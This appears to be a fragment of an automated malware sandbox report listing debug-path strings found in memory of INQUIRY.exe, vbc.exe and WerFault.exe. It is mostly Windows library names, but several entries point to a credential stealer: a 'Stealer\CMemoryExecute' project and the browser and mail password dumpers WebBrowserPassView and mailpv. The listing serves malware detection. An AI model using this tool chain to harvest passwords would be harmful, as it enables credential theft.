                    Source: Binary string: oleaut32.pdb8hUi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\Microsoft.VisualBasic.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorjit.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: shfolder.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdbe source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb_ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasman.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fastprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wintrust.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb- source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdbbi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbS source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee-c source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: tsymbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: combase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdbThqia source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: 1_oC:\Windows\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: crypt32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb; source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: edputil.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdbi source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb1 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.698848743.00000000049D4000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdbJhgiX source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb$hAi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb/ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: profapi.pdbkRi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb6hSi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winnsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb] source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\mscorlib.pdbd source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdbo source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdbqa{ source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: INQUIRY.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: sxs.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rtutils.pdb? source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoree.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbxi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Z[zTs5.pdb6 source: INQUIRY.exe, 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp
                    Source: Binary string: cordacwks.pdb^hkiY source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb@hmi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdbG source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb) source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: security.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb{ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdbLhYiL source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbo source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp
                    Source: Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb7 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.698225687.0000000002BC7000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb9 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb&kpir source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb(kji source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb# source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: .pdb* source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: secur32.pdbvi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb5 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb! source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbe source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcr80.i386.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdbq source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb.h;i source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb"hOi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
